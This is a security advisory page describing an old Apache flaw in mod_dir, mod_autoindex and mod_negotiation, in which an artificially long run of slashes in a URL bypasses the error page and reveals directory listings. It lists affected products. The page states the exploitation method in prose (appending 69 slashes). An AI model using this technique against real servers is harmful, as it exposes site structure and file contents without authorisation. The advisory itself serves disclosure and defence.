J-Security Center

Title: Apache Artificially Long Slash Path Directory Listing Vulnerability

Severity: HIGH

Description:

Apache Webserver is a freely available, open-source software package developed and actively maintained by the Apache Software Foundation. The Apache Webserver is a robust, highly configurable, scalable webserver with high deployment and popularity.

A problem in the default installation of the Apache webserver could allow attackers to gain information about the server's web structure. This problem affects modules mod_dir, mod_autoindex, and mod_negotiation.

The mod_dir module is the basic directory-handling module, which is used to reference the index.html file of each directory. The mod_autoindex module is used to set icons to files when a directory listing has been requested. The mod_negotiation module is designed to select content that depends on variables received from the browser of a user trying to access a hosted page.

A problem input handled by these modules can allow an attacker to bypass the error page used for non-existing directories. By sending the server a custom-crafted request consisting of an artificially long path created by numerous slashes, the attacker can bypass the error page and instead view a listing of the directory's contents. This vulnerability affects all versions of Apache previous to 1.3.19.
This vulnerability is exploited by appending 69 slashes to the end of an URL. This exploit may also reveal the contents of files that are readable to the HTTP server by taking the number of characters in the filename and substituting that number of slashes with the filename.

Affected Products:

  • Apache Software Foundation Apache 1.3.12
  • Apache Software Foundation Apache 1.3.14
  • Apache Software Foundation Apache 1.3.17
  • Apache Software Foundation Apache 1.3.17
  • Apache Software Foundation Apache 1.3.3
  • Apache Software Foundation Apache 1.3.4
  • Apache Software Foundation Apache 1.3.9
  • BSDI BSD/OS 4.0.0
  • Debian Linux 2.2.0
  • Debian Linux 2.2.0 68k
  • Debian Linux 2.2.0 alpha
  • Debian Linux 2.2.0 arm
  • Debian Linux 2.2.0 powerpc
  • Debian Linux 2.2.0 sparc
  • EnGarde Secure Linux 1.0.1
  • MandrakeSoft Corporate Server 1.0.1
  • MandrakeSoft Linux Mandrake 7.1.0
  • MandrakeSoft Linux Mandrake 7.2.0
  • MandrakeSoft Linux Mandrake 8.0.0
  • MandrakeSoft Linux Mandrake 8.0.0 ppc
  • Netscreen NetScreen-Global PRO Express Policy Manager Server
  • Netscreen NetScreen-Global PRO Policy Manager Server
  • OpenBSD OpenBSD 2.8.0
  • RedHat Linux 5.2.0 alpha
  • RedHat Linux 5.2.0 i386
  • RedHat Linux 5.2.0 sparc
  • RedHat Linux 6.2.0 alpha
  • RedHat Linux 6.2.0 i386
  • RedHat Linux 6.2.0 sparc
  • RedHat Linux 7.0.0 alpha
  • RedHat Linux 7.0.0 i386
  • S.u.S.E. Linux 7.0.0
  • S.u.S.E. Linux 7.0.0 sparc
  • S.u.S.E. Linux 7.1.0
  • SGI IRIX 6.5.0
  • SGI IRIX 6.5.1
  • SGI IRIX 6.5.10
  • SGI IRIX 6.5.11
  • SGI IRIX 6.5.2
  • SGI IRIX 6.5.3
  • SGI IRIX 6.5.4
  • SGI IRIX 6.5.5
  • SGI IRIX 6.5.6
  • SGI IRIX 6.5.7
  • SGI IRIX 6.5.8
  • SGI IRIX 6.5.9
  • Sun Cobalt ManageRaQ v2 3599BD
  • Sun Cobalt Qube3 4000WG
  • Sun Cobalt RaQ XTR 3500R
  • Sun Cobalt RaQ4 3001R
  • Sun Solaris 8
  • Sun Solaris 8_x86
  • Sun SunOS 5.8.0
  • Sun SunOS 5.8.0 _x86

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.